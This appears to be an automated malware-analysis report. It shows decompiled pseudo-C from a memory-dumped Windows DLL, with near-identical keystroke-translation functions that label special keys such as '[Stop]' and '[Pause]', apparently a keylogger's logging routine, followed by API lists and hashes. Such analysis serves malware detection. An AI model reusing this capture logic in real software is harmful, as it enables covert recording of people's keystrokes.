			E100075DA(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[Previous Track]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x100075da
0x100075da
0x100075e1
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886
[Previous Track], xrefs: 100075DC

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[Previous Track]
API String ID: 783433895-3210990766
Opcode ID: ae1fa225a0918d02fcfd180ec664d208efe1b38483678a19622561ea0e0a9972
Instruction ID: 497027ec4e24f1f338977bd459717c223580bce7c7b0098a339831e971cc0eb2
Opcode Fuzzy Hash: ae1fa225a0918d02fcfd180ec664d208efe1b38483678a19622561ea0e0a9972
Instruction Fuzzy Hash: E131C2B8F042545BF722C7658C45B9F73A9FB892C0F50C0A5F5489724ECA78EE45C761

Uniqueness

Uniqueness Score: -1.00%

Function 100075EB, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E100075EB(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[Stop]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x100075eb
0x100075eb
0x100075f2
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886
[Stop], xrefs: 100075ED

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[Stop]
API String ID: 783433895-3279900245
Opcode ID: 57c83d590c1141da6764717a6adadb01255764739223c7300deac7d1602d8fdb
Instruction ID: 5922670b37668e1b016a45364b7f0f1fd26dfdd2ab1d479554ab01751d872b69
Opcode Fuzzy Hash: 57c83d590c1141da6764717a6adadb01255764739223c7300deac7d1602d8fdb
Instruction Fuzzy Hash: 3531BEB8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE458B61

Uniqueness

Uniqueness Score: -1.00%

Function 100075FC, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E100075FC(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[Mode Change]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x100075fc
0x100075fc
0x10007603
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

[Mode Change], xrefs: 100075FE
Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[Mode Change]
API String ID: 783433895-697438833
Opcode ID: 951490631784bd0ba326a047b941ed8099158b17901292eede5ad9bfe8389a96
Instruction ID: fde19adec7dbaa11acaab95407c7a091db194ab80798eb66de65d17821cfaf80
Opcode Fuzzy Hash: 951490631784bd0ba326a047b941ed8099158b17901292eede5ad9bfe8389a96
Instruction Fuzzy Hash: E631C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F6489720ECA78EE45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 1000760D, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E1000760D(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[Page Down]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x1000760d
0x1000760d
0x10007614
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886
[Page Down], xrefs: 1000760F

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[Page Down]
API String ID: 783433895-3750966751
Opcode ID: 90d8874289e11761f89f11684cbec7ed874ee66b227f605c1b29b6e1100aa61f
Instruction ID: 2fd29d5386bce6dd60f48b13cf1f1d6e541de4379b2d15e3869f5661c23656ba
Opcode Fuzzy Hash: 90d8874289e11761f89f11684cbec7ed874ee66b227f605c1b29b6e1100aa61f
Instruction Fuzzy Hash: CC31C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 1000761E, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E1000761E(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[Num Lock]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x1000761e
0x1000761e
0x10007625
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

[Num Lock], xrefs: 10007620
Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[Num Lock]
API String ID: 783433895-3773462824
Opcode ID: 1422f95064fd9bc28c63e91cd01088c80977b6f7f954c3e9b92471192964d997
Instruction ID: b38ecb3cb3baf4de96862ef28da595c431d1415fe82338e8afeba86307a38cc0
Opcode Fuzzy Hash: 1422f95064fd9bc28c63e91cd01088c80977b6f7f954c3e9b92471192964d997
Instruction Fuzzy Hash: 1431C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 1000762F, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E1000762F(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[Pause]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x1000762f
0x1000762f
0x10007636
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
